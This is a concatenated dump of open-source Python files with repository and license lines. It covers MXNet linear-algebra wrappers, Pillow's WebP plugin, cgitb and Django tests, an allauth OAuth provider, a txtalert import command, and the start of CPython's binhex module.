[ 1.5, -0.5]])
Inverses of several matrices can be computed at once:
>>> a = np.array([[[1., 2.], [3., 4.]], [[1, 3], [3, 5]]])
>>> np.linalg.inv(a)
array([[[-2. , 1. ],
[ 1.5 , -0.5 ]],
[[-1.2500001 , 0.75000006],
[ 0.75000006, -0.25000003]]])
"""
return _npi.inv(a)
def det(a):
r"""
Compute the determinant of an array.
Parameters
----------
a : (..., M, M) ndarray
Input array to compute determinants for.
Returns
-------
det : (...) ndarray
Determinant of `a`.
See Also
--------
slogdet : Another way to represent the determinant, more suitable
for large matrices where underflow/overflow may occur.
Notes
-----
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The determinant is computed via LU factorization using the LAPACK
routine z/dgetrf.
Examples
--------
The determinant of a 2-D array [[a, b], [c, d]] is ad - bc:
>>> a = np.array([[1, 2], [3, 4]])
>>> np.linalg.det(a)
-2.0
Computing determinants for a stack of matrices:
>>> a = np.array([ [[1, 2], [3, 4]], [[1, 2], [2, 1]], [[1, 3], [3, 1]] ])
>>> a.shape
(3, 2, 2)
>>> np.linalg.det(a)
array([-2., -3., -8.])
"""
return _npi.det(a)
def slogdet(a):
r"""
Compute the sign and (natural) logarithm of the determinant of an array.
If an array has a very small or very large determinant, then a call to
`det` may overflow or underflow. This routine is more robust against such
issues, because it computes the logarithm of the determinant rather than
the determinant itself.
Parameters
----------
a : (..., M, M) ndarray
Input array, has to be a square 2-D array.
Returns
-------
sign : (...) ndarray
A number representing the sign of the determinant. For a real matrix,
this is 1, 0, or -1.
logdet : (...) array_like
The natural log of the absolute value of the determinant.
If the determinant is zero, then `sign` will be 0 and `logdet` will be
-Inf. In all cases, the determinant is equal to ``sign * np.exp(logdet)``.
See Also
--------
det
Notes
-----
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The determinant is computed via LU factorization using the LAPACK
routine z/dgetrf.
Examples
--------
The determinant of a 2-D array ``[[a, b], [c, d]]`` is ``ad - bc``:
>>> a = np.array([[1, 2], [3, 4]])
>>> (sign, logdet) = np.linalg.slogdet(a)
>>> (sign, logdet)
(-1., 0.69314718055994529)
>>> sign * np.exp(logdet)
-2.0
Computing log-determinants for a stack of matrices:
>>> a = np.array([ [[1, 2], [3, 4]], [[1, 2], [2, 1]], [[1, 3], [3, 1]] ])
>>> a.shape
(3, 2, 2)
>>> sign, logdet = np.linalg.slogdet(a)
>>> (sign, logdet)
(array([-1., -1., -1.]), array([ 0.69314718, 1.09861229, 2.07944154]))
>>> sign * np.exp(logdet)
array([-2., -3., -8.])
This routine succeeds where ordinary `det` does not:
>>> np.linalg.det(np.eye(500) * 0.1)
0.0
>>> np.linalg.slogdet(np.eye(500) * 0.1)
(1., -1151.2925464970228)
"""
return _npi.slogdet(a)
def solve(a, b):
r"""
Solve a linear matrix equation, or system of linear scalar equations.
Computes the "exact" solution, `x`, of the well-determined, i.e., full
rank, linear matrix equation `ax = b`.
Parameters
----------
a : (..., M, M) ndarray
Coefficient matrix.
b : {(..., M,), (..., M, K)}, ndarray
Ordinate or "dependent variable" values.
Returns
-------
x : {(..., M,), (..., M, K)} ndarray
Solution to the system a x = b. Returned shape is identical to `b`.
Raises
------
MXNetError
If `a` is singular or not square.
Notes
-----
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The solutions are computed using LAPACK routine ``_gesv``.
`a` must be square and of full-rank, i.e., all rows (or, equivalently,
columns) must be linearly independent; if either is not true, use
`lstsq` for the least-squares best "solution" of the
system/equation.
Examples
--------
Solve the system of equations ``3 * x0 + x1 = 9`` and ``x0 + 2 * x1 = 8``:
>>> a = np.array([[3,1], [1,2]])
>>> b = np.array([9,8])
>>> x = np.linalg.solve(a, b)
>>> x
array([2., 3.])
Check that the solution is correct:
>>> np.allclose(np.dot(a, x), b)
True
"""
return _npi.solve(a, b)
def tensorinv(a, ind=2):
r"""
Compute the 'inverse' of an N-dimensional array.
The result is an inverse for `a` relative to the tensordot operation
``tensordot(a, b, ind)``, i. e., up to floating-point accuracy,
``tensordot(tensorinv(a), a, ind)`` is the "identity" tensor for the
tensordot operation.
Parameters
----------
a : array_like
Tensor to 'invert'. Its shape must be 'square', i. e.,
``prod(a.shape[:ind]) == prod(a.shape[ind:])``.
ind : int, optional
Number of first indices that are involved in the inverse sum.
Must be a positive integer, default is 2.
Returns
-------
b : ndarray
`a`'s tensordot inverse, shape ``a.shape[ind:] + a.shape[:ind]``.
Raises
------
MXNetError
If `a` is singular or not 'square' (in the above sense).
See Also
--------
tensordot, tensorsolve
Examples
--------
>>> a = np.eye(4*6)
>>> a.shape = (4, 6, 8, 3)
>>> ainv = np.linalg.tensorinv(a, ind=2)
>>> ainv.shape
(8, 3, 4, 6)
>>> b = np.random.randn(4, 6)
>>> np.allclose(np.tensordot(ainv, b), np.linalg.tensorsolve(a, b))
True
>>> a = np.eye(4*6)
>>> a.shape = (24, 8, 3)
>>> ainv = np.linalg.tensorinv(a, ind=1)
>>> ainv.shape
(8, 3, 24)
>>> b = np.random.randn(24)
>>> np.allclose(np.tensordot(ainv, b, 1), np.linalg.tensorsolve(a, b))
True
"""
return _npi.tensorinv(a, ind)
def tensorsolve(a, b, axes=None):
r"""
Solve the tensor equation ``a x = b`` for x.
It is assumed that all indices of `x` are summed over in the product,
together with the rightmost indices of `a`, as is done in, for example,
``tensordot(a, x, axes=b.ndim)``.
Parameters
----------
a : ndarray
Coefficient tensor, of shape ``b.shape + Q``. `Q`, a tuple, equals
the shape of that sub-tensor of `a` consisting of the appropriate
number of its rightmost indices, and must be such that
``prod(Q) == prod(b.shape)`` (in which sense `a` is said to be
'square').
b : ndarray
Right-hand tensor, which can be of any shape.
axes : tuple of ints, optional
Axes in `a` to reorder to the right, before inversion.
If None (default), no reordering is done.
Returns
-------
x : ndarray, shape Q
Raises
------
MXNetError
If `a` is singular or not 'square' (in the above sense).
See Also
--------
numpy.tensordot, tensorinv, numpy.einsum
Examples
--------
>>> a = np.eye(2*3*4)
>>> a.shape = (2*3, 4, 2, 3, 4)
>>> b = np.random.randn(2*3, 4)
>>> x = np.linalg.tensorsolve(a, b)
>>> x.shape
(2, 3, 4)
>>> np.allclose(np.tensordot(a, x, axes=3), b)
True
"""
return _npi.tensorsolve(a, b, axes)
def eigvals(a):
r"""
Compute the eigenvalues of a general matrix.
Main difference between `eigvals` and `eig`: the eigenvectors aren't
returned.
Parameters
----------
a : (..., M, M) ndarray
A real-valued matrix whose eigenvalues will be computed.
Returns
-------
w : (..., M,) ndarray
The eigenvalues, each repeated according to its multiplicity.
They are not necessarily ordered.
Raises
------
MXNetError
If the eigenvalue computation does not converge.
See Also
--------
eig : eigenvalues and right eigenvectors of general arrays
eigh : eigenvalues and eigenvectors of a real symmetric array.
eigvalsh : eigenvalues of a real symmetric.
Notes
-----
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
This is implemented using the ``_geev`` LAPACK routines which compute
the eigenvalues and eigenvectors of general square arrays.
This function differs from the original `numpy.linalg.eigvals
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.linalg.eigvals.html>`_ in
the following way(s):
- Does not support complex input and output.
"""
return _npi.eigvals(a)
def eigvalsh(a, UPLO='L'):
r"""
Compute the eigenvalues real symmetric matrix.
Main difference from eigh: the eigenvectors are not computed.
Parameters
----------
a : (..., M, M) ndarray
A real-valued matrix whose eigenvalues are to be computed.
UPLO : {'L', 'U'}, optional
Specifies whether the calculation is done with the lower triangular
part of `a` ('L', default) or the upper triangular part ('U').
Irrespective of this value only the real parts of the diagonal will
be considered in the computation to preserve the notion of a Hermitian
matrix. It therefore follows that the imaginary part of the diagonal
will always be treated as zero.
Returns
-------
w : (..., M,) ndarray
The eigenvalues in ascending order, each repeated according to
its multiplicity.
Raises
------
MXNetError
If the eigenvalue computation does not converge.
See Also
--------
eig : eigenvalues and right eigenvectors of general arrays
eigvals : eigenvalues of a non-symmetric array.
eigh : eigenvalues and eigenvectors of a real symmetric array.
Notes
-----
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The eigenvalues are computed using LAPACK routines ``_syevd``.
This function differs from the original `numpy.linalg.eigvalsh
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.linalg.eigvalsh.html>`_ in
the following way(s):
- Does not support complex input and output.
"""
return _npi.eigvalsh(a, UPLO)
def eig(a):
r"""
Compute the eigenvalues and right eigenvectors of a square array.
Parameters
----------
a : (..., M, M) ndarray
Matrices for which the eigenvalues and right eigenvectors will
be computed
Returns
-------
w : (..., M) ndarray
The eigenvalues, each repeated according to its multiplicity.
The eigenvalues are not necessarily ordered.
v : (..., M, M) ndarray
The normalized (unit "length") eigenvectors, such that the
column ``v[:,i]`` is the eigenvector corresponding to the
eigenvalue ``w[i]``.
Raises
------
MXNetError
If the eigenvalue computation does not converge.
See Also
--------
eigvals : eigenvalues of a non-symmetric array.
eigh : eigenvalues and eigenvectors of a real symmetric array.
eigvalsh : eigenvalues of a real symmetric.
Notes
-----
This is implemented using the ``_geev`` LAPACK routines which compute
the eigenvalues and eigenvectors of general square arrays.
The number `w` is an eigenvalue of `a` if there exists a vector
`v` such that ``dot(a,v) = w * v``. Thus, the arrays `a`, `w`, and
`v` satisfy the equations ``dot(a[:,:], v[:,i]) = w[i] * v[:,i]``
for :math:`i \\in \\{0,...,M-1\\}`.
The array `v` of eigenvectors may not be of maximum rank, that is, some
of the columns may be linearly dependent, although round-off error may
obscure that fact. If the eigenvalues are all different, then theoretically
the eigenvectors are linearly independent.
This function differs from the original `numpy.linalg.eig
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.linalg.eig.html>`_ in
the following way(s):
- Does not support complex input and output.
"""
return _npi.eig(a)
def eigh(a, UPLO='L'):
r"""
Return the eigenvalues and eigenvectors real symmetric matrix.
Returns two objects, a 1-D array containing the eigenvalues of `a`, and
a 2-D square array or matrix (depending on the input type) of the
corresponding eigenvectors (in columns).
Parameters
----------
a : (..., M, M) ndarray
real symmetric matrices whose eigenvalues and eigenvectors are to be computed.
UPLO : {'L', 'U'}, optional
Specifies whether the calculation is done with the lower triangular
part of `a` ('L', default) or the upper triangular part ('U').
Irrespective of this value only the real parts of the diagonal will
be considered in the computation to preserve the notion of a Hermitian
matrix. It therefore follows that the imaginary part of the diagonal
will always be treated as zero.
Returns
-------
w : (..., M) ndarray
The eigenvalues in ascending order, each repeated according to
its multiplicity.
v : {(..., M, M) ndarray, (..., M, M) matrix}
The column ``v[:, i]`` is the normalized eigenvector corresponding
to the eigenvalue ``w[i]``. Will return a matrix object if `a` is
a matrix object.
Raises
------
MXNetError
If the eigenvalue computation does not converge.
See Also
--------
eig : eigenvalues and right eigenvectors of general arrays
eigvals : eigenvalues of a non-symmetric array.
eigvalsh : eigenvalues of a real symmetric.
Notes
-----
The eigenvalues/eigenvectors are computed using LAPACK routines ``_syevd``.
This function differs from the original `numpy.linalg.eigh
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.linalg.eigh.html>`_ in
the following way(s):
- Does not support complex input and output.
"""
return _npi.eigh(a, UPLO)
| apache-2.0 |
SurfasJones/icecream-info | icecream/lib/python2.7/site-packages/PIL/WebPImagePlugin.py | 8 | 1946 | from PIL import Image
from PIL import ImageFile
from io import BytesIO
from PIL import _webp
_VALID_WEBP_MODES = {
"RGB": True,
"RGBA": True,
}
_VP8_MODES_BY_IDENTIFIER = {
b"VP8 ": "RGB",
b"VP8X": "RGBA",
b"VP8L": "RGBA", # lossless
}
def _accept(prefix):
is_riff_file_format = prefix[:4] == b"RIFF"
is_webp_file = prefix[8:12] == b"WEBP"
is_valid_vp8_mode = prefix[12:16] in _VP8_MODES_BY_IDENTIFIER
return is_riff_file_format and is_webp_file and is_valid_vp8_mode
class WebPImageFile(ImageFile.ImageFile):
format = "WEBP"
format_description = "WebP image"
def _open(self):
data, width, height, self.mode, icc_profile, exif = _webp.WebPDecode(self.fp.read())
if icc_profile:
self.info["icc_profile"] = icc_profile
if exif:
self.info["exif"] = exif
self.size = width, height
self.fp = BytesIO(data)
self.tile = [("raw", (0, 0) + self.size, 0, self.mode)]
def _getexif(self):
from PIL.JpegImagePlugin import _getexif
return _getexif(self)
def _save(im, fp, filename):
image_mode = im.mode
if im.mode not in _VALID_WEBP_MODES:
raise IOError("cannot write mode %s as WEBP" % image_mode)
lossless = im.encoderinfo.get("lossless", False)
quality = im.encoderinfo.get("quality", 80)
icc_profile = im.encoderinfo.get("icc_profile", "")
exif = im.encoderinfo.get("exif", "")
data = _webp.WebPEncode(
im.tobytes(),
im.size[0],
im.size[1],
lossless,
float(quality),
im.mode,
icc_profile,
exif
)
if data is None:
raise IOError("cannot write file as WEBP (encoder returned None)")
fp.write(data)
Image.register_open("WEBP", WebPImageFile, _accept)
Image.register_save("WEBP", _save)
Image.register_extension("WEBP", ".webp")
Image.register_mime("WEBP", "image/webp")
| mit |
kikocorreoso/brython | www/src/Lib/test/test_cgitb.py | 5 | 2565 | from test.support import temp_dir
from test.support.script_helper import assert_python_failure
import unittest
import sys
import cgitb
class TestCgitb(unittest.TestCase):
def test_fonts(self):
text = "Hello Robbie!"
self.assertEqual(cgitb.small(text), "<small>{}</small>".format(text))
self.assertEqual(cgitb.strong(text), "<strong>{}</strong>".format(text))
self.assertEqual(cgitb.grey(text),
'<font color="#909090">{}</font>'.format(text))
def test_blanks(self):
self.assertEqual(cgitb.small(""), "")
self.assertEqual(cgitb.strong(""), "")
self.assertEqual(cgitb.grey(""), "")
def test_html(self):
try:
raise ValueError("Hello World")
except ValueError as err:
# If the html was templated we could do a bit more here.
# At least check that we get details on what we just raised.
html = cgitb.html(sys.exc_info())
self.assertIn("ValueError", html)
self.assertIn(str(err), html)
def test_text(self):
try:
raise ValueError("Hello World")
except ValueError as err:
text = cgitb.text(sys.exc_info())
self.assertIn("ValueError", text)
self.assertIn("Hello World", text)
def test_syshook_no_logdir_default_format(self):
with temp_dir() as tracedir:
rc, out, err = assert_python_failure(
'-c',
('import cgitb; cgitb.enable(logdir=%s); '
'raise ValueError("Hello World")') % repr(tracedir))
out = out.decode(sys.getfilesystemencoding())
self.assertIn("ValueError", out)
self.assertIn("Hello World", out)
self.assertIn("<strong><module></strong>", out)
# By default we emit HTML markup.
self.assertIn('<p>', out)
self.assertIn('</p>', out)
def test_syshook_no_logdir_text_format(self):
# Issue 12890: we were emitting the <p> tag in text mode.
with temp_dir() as tracedir:
rc, out, err = assert_python_failure(
'-c',
('import cgitb; cgitb.enable(format="text", logdir=%s); '
'raise ValueError("Hello World")') % repr(tracedir))
out = out.decode(sys.getfilesystemencoding())
self.assertIn("ValueError", out)
self.assertIn("Hello World", out)
self.assertNotIn('<p>', out)
self.assertNotIn('</p>', out)
if __name__ == "__main__":
unittest.main()
| bsd-3-clause |
ZachLiuGIS/django-allauth | allauth/socialaccount/providers/odnoklassniki/provider.py | 64 | 1383 | from allauth.socialaccount import providers
from allauth.socialaccount.providers.base import ProviderAccount
from allauth.socialaccount.providers.oauth2.provider import OAuth2Provider
class OdnoklassnikiAccount(ProviderAccount):
def get_profile_url(self):
return self.account.extra_data.get('link')
def get_avatar_url(self):
ret = None
pic_big_url = self.account.extra_data.get('pic1024x768')
pic_medium_url = self.account.extra_data.get('pic640x480')
pic_small_url = self.account.extra_data.get('pic190x190')
if pic_big_url:
return pic_big_url
elif pic_medium_url:
return pic_medium_url
elif pic_small_url:
return pic_small_url
else:
return ret
def to_str(self):
dflt = super(OdnoklassnikiAccount, self).to_str()
return self.account.extra_data.get('name', dflt)
class OdnoklassnikiProvider(OAuth2Provider):
id = 'odnoklassniki'
name = 'Odnoklassniki'
package = 'allauth.socialaccount.providers.odnoklassniki'
account_class = OdnoklassnikiAccount
def extract_uid(self, data):
return data['uid']
def extract_common_fields(self, data):
return dict(last_name=data.get('last_name'),
first_name=data.get('first_name'))
providers.registry.register(OdnoklassnikiProvider)
| mit |
RichardLitt/wyrd-django-dev | tests/modeltests/update_only_fields/tests.py | 7 | 9587 | from __future__ import absolute_import
from django.db.models.signals import pre_save, post_save
from django.test import TestCase
from .models import Person, Employee, ProxyEmployee, Profile, Account
class UpdateOnlyFieldsTests(TestCase):
def test_update_fields_basic(self):
s = Person.objects.create(name='Sara', gender='F')
self.assertEqual(s.gender, 'F')
s.gender = 'M'
s.name = 'Ian'
s.save(update_fields=['name'])
s = Person.objects.get(pk=s.pk)
self.assertEqual(s.gender, 'F')
self.assertEqual(s.name, 'Ian')
def test_update_fields_deferred(self):
s = Person.objects.create(name='Sara', gender='F', pid=22)
self.assertEqual(s.gender, 'F')
s1 = Person.objects.defer("gender", "pid").get(pk=s.pk)
s1.name = "Emily"
s1.gender = "M"
with self.assertNumQueries(1):
s1.save()
s2 = Person.objects.get(pk=s1.pk)
self.assertEqual(s2.name, "Emily")
self.assertEqual(s2.gender, "M")
def test_update_fields_only_1(self):
s = Person.objects.create(name='Sara', gender='F')
self.assertEqual(s.gender, 'F')
s1 = Person.objects.only('name').get(pk=s.pk)
s1.name = "Emily"
s1.gender = "M"
with self.assertNumQueries(1):
s1.save()
s2 = Person.objects.get(pk=s1.pk)
self.assertEqual(s2.name, "Emily")
self.assertEqual(s2.gender, "M")
def test_update_fields_only_2(self):
s = Person.objects.create(name='Sara', gender='F', pid=22)
self.assertEqual(s.gender, 'F')
s1 = Person.objects.only('name').get(pk=s.pk)
s1.name = "Emily"
s1.gender = "M"
with self.assertNumQueries(2):
s1.save(update_fields=['pid'])
s2 = Person.objects.get(pk=s1.pk)
self.assertEqual(s2.name, "Sara")
self.assertEqual(s2.gender, "F")
def test_update_fields_only_repeated(self):
s = Person.objects.create(name='Sara', gender='F')
self.assertEqual(s.gender, 'F')
s1 = Person.objects.only('name').get(pk=s.pk)
s1.gender = 'M'
with self.assertNumQueries(1):
s1.save()
# Test that the deferred class does not remember that gender was
# set, instead the instace should remember this.
s1 = Person.objects.only('name').get(pk=s.pk)
with self.assertNumQueries(1):
s1.save()
def test_update_fields_inheritance_defer(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
e1 = Employee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
e1 = Employee.objects.only('name').get(pk=e1.pk)
e1.name = 'Linda'
with self.assertNumQueries(1):
e1.save()
self.assertEqual(Employee.objects.get(pk=e1.pk).name,
'Linda')
def test_update_fields_fk_defer(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
profile_receptionist = Profile.objects.create(name='Receptionist', salary=1000)
e1 = Employee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
e1 = Employee.objects.only('profile').get(pk=e1.pk)
e1.profile = profile_receptionist
with self.assertNumQueries(1):
e1.save()
self.assertEqual(Employee.objects.get(pk=e1.pk).profile, profile_receptionist)
e1.profile_id = profile_boss.pk
with self.assertNumQueries(1):
e1.save()
self.assertEqual(Employee.objects.get(pk=e1.pk).profile, profile_boss)
def test_select_related_only_interaction(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
e1 = Employee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
e1 = Employee.objects.only('profile__salary').select_related('profile').get(pk=e1.pk)
profile_boss.name = 'Clerk'
profile_boss.salary = 1000
profile_boss.save()
# The loaded salary of 3000 gets saved, the name of 'Clerk' isn't
# overwritten.
with self.assertNumQueries(1):
e1.profile.save()
reloaded_profile = Profile.objects.get(pk=profile_boss.pk)
self.assertEqual(reloaded_profile.name, profile_boss.name)
self.assertEqual(reloaded_profile.salary, 3000)
def test_update_fields_m2m(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
e1 = Employee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
a1 = Account.objects.create(num=1)
a2 = Account.objects.create(num=2)
e1.accounts = [a1,a2]
with self.assertRaises(ValueError):
e1.save(update_fields=['accounts'])
def test_update_fields_inheritance(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
profile_receptionist = Profile.objects.create(name='Receptionist', salary=1000)
e1 = Employee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
e1.name = 'Ian'
e1.gender = 'M'
e1.save(update_fields=['name'])
e2 = Employee.objects.get(pk=e1.pk)
self.assertEqual(e2.name, 'Ian')
self.assertEqual(e2.gender, 'F')
self.assertEqual(e2.profile, profile_boss)
e2.profile = profile_receptionist
e2.name = 'Sara'
e2.save(update_fields=['profile'])
e3 = Employee.objects.get(pk=e1.pk)
self.assertEqual(e3.name, 'Ian')
self.assertEqual(e3.profile, profile_receptionist)
with self.assertNumQueries(1):
e3.profile = profile_boss
e3.save(update_fields=['profile_id'])
e4 = Employee.objects.get(pk=e3.pk)
self.assertEqual(e4.profile, profile_boss)
self.assertEqual(e4.profile_id, profile_boss.pk)
def test_update_fields_inheritance_with_proxy_model(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
profile_receptionist = Profile.objects.create(name='Receptionist', salary=1000)
e1 = ProxyEmployee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
e1.name = 'Ian'
e1.gender = 'M'
e1.save(update_fields=['name'])
e2 = ProxyEmployee.objects.get(pk=e1.pk)
self.assertEqual(e2.name, 'Ian')
self.assertEqual(e2.gender, 'F')
self.assertEqual(e2.profile, profile_boss)
e2.profile = profile_receptionist
e2.name = 'Sara'
e2.save(update_fields=['profile'])
e3 = ProxyEmployee.objects.get(pk=e1.pk)
self.assertEqual(e3.name, 'Ian')
self.assertEqual(e3.profile, profile_receptionist)
def test_update_fields_signals(self):
p = Person.objects.create(name='Sara', gender='F')
pre_save_data = []
def pre_save_receiver(**kwargs):
pre_save_data.append(kwargs['update_fields'])
pre_save.connect(pre_save_receiver)
post_save_data = []
def post_save_receiver(**kwargs):
post_save_data.append(kwargs['update_fields'])
post_save.connect(post_save_receiver)
p.save(update_fields=['name'])
self.assertEqual(len(pre_save_data), 1)
self.assertEqual(len(pre_save_data[0]), 1)
self.assertTrue('name' in pre_save_data[0])
self.assertEqual(len(post_save_data), 1)
self.assertEqual(len(post_save_data[0]), 1)
self.assertTrue('name' in post_save_data[0])
def test_update_fields_incorrect_params(self):
s = Person.objects.create(name='Sara', gender='F')
with self.assertRaises(ValueError):
s.save(update_fields=['first_name'])
with self.assertRaises(ValueError):
s.save(update_fields="name")
def test_empty_update_fields(self):
s = Person.objects.create(name='Sara', gender='F')
pre_save_data = []
def pre_save_receiver(**kwargs):
pre_save_data.append(kwargs['update_fields'])
pre_save.connect(pre_save_receiver)
post_save_data = []
def post_save_receiver(**kwargs):
post_save_data.append(kwargs['update_fields'])
post_save.connect(post_save_receiver)
# Save is skipped.
with self.assertNumQueries(0):
s.save(update_fields=[])
# Signals were skipped, too...
self.assertEqual(len(pre_save_data), 0)
self.assertEqual(len(post_save_data), 0)
def test_num_queries_inheritance(self):
s = Employee.objects.create(name='Sara', gender='F')
s.employee_num = 1
s.name = 'Emily'
with self.assertNumQueries(1):
s.save(update_fields=['employee_num'])
s = Employee.objects.get(pk=s.pk)
self.assertEqual(s.employee_num, 1)
self.assertEqual(s.name, 'Sara')
s.employee_num = 2
s.name = 'Emily'
with self.assertNumQueries(1):
s.save(update_fields=['name'])
s = Employee.objects.get(pk=s.pk)
self.assertEqual(s.name, 'Emily')
self.assertEqual(s.employee_num, 1)
# A little sanity check that we actually did updates...
self.assertEqual(Employee.objects.count(), 1)
self.assertEqual(Person.objects.count(), 1)
with self.assertNumQueries(2):
s.save(update_fields=['name', 'employee_num'])
| bsd-3-clause |
praekelt/txtalert | txtalert/apps/therapyedge/management/commands/te_import_test.py | 1 | 3299 | from datetime import datetime, timedelta
from django.utils import timezone
from django.contrib.auth.models import User
from django.core.management.base import BaseCommand
from django.conf import settings
from optparse import make_option
from txtalert.apps.general.settings.models import Setting
from txtalert.apps.therapyedge.importer import Importer
from txtalert.core.models import Clinic
import sys
class Command(BaseCommand):
help = "Can be run as a cronjob or directly to send import TherapyEdge data."
option_list = BaseCommand.option_list + (
make_option('--username', dest='username',
help='Specifies the user to import for.'),
) + (
make_option('--te_ids', dest='te_ids',
help='Specifies the te_id to test for.'),
) + (
make_option('--days_back', dest='days_back',
help='Specifies the backward date range offset, default = 1'),
) + (
make_option('--days_forward', dest='days_forward',
help='Specifies the forward date range offest, default = 30'),
)
def handle(self, *args, **kwargs):
importer = Importer(
uri='https://%s:%s@41.0.13.99/tools/ws/sms/patients/server.php' % (
Setting.objects.get(name='THERAPYEDGE_USERNAME').value,
Setting.objects.get(name='THERAPYEDGE_PASSWORD').value
),
verbose=settings.DEBUG
)
username = kwargs.get('username')
if not username:
sys.exit('Please provide --username')
te_ids = kwargs.get('te_ids')
if not te_ids:
sys.exit('Please provide --te_ids')
te_id_list = te_ids.split(',')
print "\nSearching coming, missed, done and deleted visits for " \
"te_id's in:\n%s" % repr(te_id_list)
days_back = int(kwargs.get('days_back') or 1)
print "From %s days back" % days_back
days_forward = int(kwargs.get('days_forward') or 30)
print "to %s days forward\n" % days_forward
user = User.objects.get(username=username)
for clinic in Clinic.objects.filter(active=True, user=user):
print "Clinic name: %s" % clinic.name
print "Clinic id: %s" % clinic.te_id
midnight = timezone.now().replace(
hour=0,
minute=0,
second=0,
microsecond=0
)
since = midnight - timedelta(days=days_back)
until = midnight + timedelta(days=days_forward)
print "Since: %s" % since
print "Until: %s" % until
for v in importer.client.get_coming_visits(clinic.te_id, since, until):
if v.te_id in te_id_list:
print "\t%s" % repr(v)
for v in importer.client.get_missed_visits(clinic.te_id, since, until):
if v.te_id in te_id_list:
print "\t%s" % repr(v)
for v in importer.client.get_done_visits(clinic.te_id, since, until):
if v.te_id in te_id_list:
print "\t%s" % repr(v)
for v in importer.client.get_deleted_visits(clinic.te_id, since, until):
if v.te_id in te_id_list:
print "\t%s" % repr(v)
print ''
| gpl-3.0 |
fhaoquan/kbengine | kbe/src/lib/python/Lib/binhex.py | 89 | 13708 | """Macintosh binhex compression/decompression.
easy interface:
binhex(inputfilename, outputfilename)
hexbin(inputfilename, outputfilename)
"""
#
# Jack Jansen, CWI, August 1995.
#
# The module is supposed to be as compatible as possible. Especially the
# easy interface should work "as expected" on any platform.
# XXXX Note: currently, textfiles appear in mac-form on all platforms.
# We seem to lack a simple character-translate in python.
# (we should probably use ISO-Latin-1 on all but the mac platform).
# XXXX The simple routines are too simple: they expect to hold the complete
# files in-core. Should be fixed.
# XXXX It would be nice to handle AppleDouble format on unix
# (for servers serving macs).
# XXXX I don't understand what happens when you get 0x90 times the same byte on
# input. The resulting code (xx 90 90) would appear to be interpreted as an
# escaped *value* of 0x90. All coders I've seen appear to ignore this nicety...
#
import io
import os
import struct
import binascii
__all__ = ["binhex","hexbin","Error"]
class Error(Exception):
pass
# States (what have we written)
[_DID_HEADER, _DID_DATA, _DID_RSRC] = range(3)
# Various constants
REASONABLY_LARGE = 32768 # Minimal amount we pass the rle-coder
LINELEN = 64
RUNCHAR = b"\x90"
#
# This code is no longer byte-order dependent
class FInfo:
def __init__(self):
self.Type = '????'
self.Creator = '????'
self.Flags = 0
def getfileinfo(name):
finfo = FInfo()
with io.open(name, 'rb') as fp:
# Quick check for textfile
data = fp.read(512)
if 0 not in data:
finfo.Type = 'TEXT'
fp.seek(0, 2)
dsize = fp.tell()
dir, file = os.path.split(name)
file = file.replace(':', '-', 1)
return file, finfo, dsize, 0
class openrsrc:
def __init__(self, *args):
pass
def read(self, *args):
return b''
def write(self, *args):
pass
def close(self):
pass
class _Hqxcoderengine:
"""Write data to the coder in 3-byte chunks"""
def __init__(self, ofp):
self.ofp = ofp
self.data = b''
self.hqxdata = b''
self.linelen = LINELEN - 1
def write(self, data):
self.data = self.data + data
datalen = len(self.data)
todo = (datalen // 3) * 3
data = self.data[:todo]
self.data = self.data[todo:]
if not data:
return
self.hqxdata = self.hqxdata + binascii.b2a_hqx(data)
self._flush(0)
def _flush(self, force):
first = 0
while first <= len(self.hqxdata) - self.linelen:
last = first + self.linelen
self.ofp.write(self.hqxdata[first:last] + b'\n')
self.linelen = LINELEN
first = last
self.hqxdata = self.hqxdata[first:]
if force:
self.ofp.write(self.hqxdata + b':\n')
def close(self):
if self.data:
self.hqxdata = self.hqxdata + binascii.b2a_hqx(self.data)
self._flush(1)
self.ofp.close()
del self.ofp
class _Rlecoderengine:
"""Write data to the RLE-coder in suitably large chunks"""
def __init__(self, ofp):
self.ofp = ofp
self.data = b''
def write(self, data):
self.data = self.data + data
if len(self.data) < REASONABLY_LARGE:
return
rledata = binascii.rlecode_hqx(self.data)
self.ofp.write(rledata)
self.data = b''
def close(self):
if self.data:
rledata = binascii.rlecode_hqx(self.data)
self.ofp.write(rledata)
self.ofp.close()
del self.ofp
class BinHex:
def __init__(self, name_finfo_dlen_rlen, ofp):
name, finfo, dlen, rlen = name_finfo_dlen_rlen
close_on_error = False
if isinstance(ofp, str):
ofname = ofp
ofp = io.open(ofname, 'wb')
close_on_error = True
try:
ofp.write(b'(This file must be converted with BinHex 4.0)\r\r:')
hqxer = _Hqxcoderengine(ofp)
self.ofp = _Rlecoderengine(hqxer)
self.crc = 0
if finfo is None:
finfo = FInfo()
self.dlen = dlen
self.rlen = rlen
self._writeinfo(name, finfo)
self.state = _DID_HEADER
except:
if close_on_error:
ofp.close()
raise
def _writeinfo(self, name, finfo):
nl = len(name)
if nl > 63:
raise Error('Filename too long')
d = bytes([nl]) + name.encode("latin-1") + b'\0'
tp, cr = finfo.Type, finfo.Creator
if isinstance(tp, str):
tp = tp.encode("latin-1")
if isinstance(cr, str):
cr = cr.encode("latin-1")
d2 = tp + cr
# Force all structs to be packed with big-endian
d3 = struct.pack('>h', finfo.Flags)
d4 = struct.pack('>ii', self.dlen, self.rlen)
info = d + d2 + d3 + d4
self._write(info)
self._writecrc()
def _write(self, data):
self.crc = binascii.crc_hqx(data, self.crc)
